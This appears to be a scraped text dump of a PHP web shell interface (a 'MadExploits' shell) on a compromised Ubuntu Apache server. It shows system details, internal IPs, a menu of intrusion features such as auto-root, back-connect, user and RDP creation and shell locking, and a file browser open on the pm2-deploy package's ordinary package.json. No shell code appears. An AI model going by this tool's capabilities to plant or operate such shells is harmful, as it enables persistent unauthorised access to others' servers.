Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
pm2-deploy /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE
1.02
KB
-rw-rw-r--
README.md
3.08
KB
-rw-rw-r--
deploy
7.57
KB
-rwxrwxr-x
deploy.js
3.87
KB
-rw-rw-r--
package.json
974
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "pm2-deploy", "version": "1.0.2", "description": "Deployment system for PM2", "main": "deploy.js", "files": [ "deploy.js", "deploy" ], "engines": { "node": ">=4.0.0" }, "repository": { "type": "git", "url": "https://github.com/Unitech/pm2-deploy.git" }, "scripts": { "lint": "eslint \"**/*.js\"", "test": "mocha", "docs": "documentation readme ./deploy.js --section=API" }, "dependencies": { "run-series": "^1.1.8", "tv4": "^1.3.0" }, "devDependencies": { "better-assert": "^1.0.2", "documentation": "^11.0.0", "eslint": "^5.16.0", "eslint-config-semistandard": "^13.0.0", "eslint-config-standard": "^12.0.0", "eslint-plugin-import": "^2.14.0", "eslint-plugin-node": "^8.0.1", "eslint-plugin-promise": "^4.0.1", "eslint-plugin-standard": "^4.0.0", "mocha": "^5.2.0", "should": "^13.2.3" }, "author": "Alexandre Strzelewicz", "license": "MIT" }
Close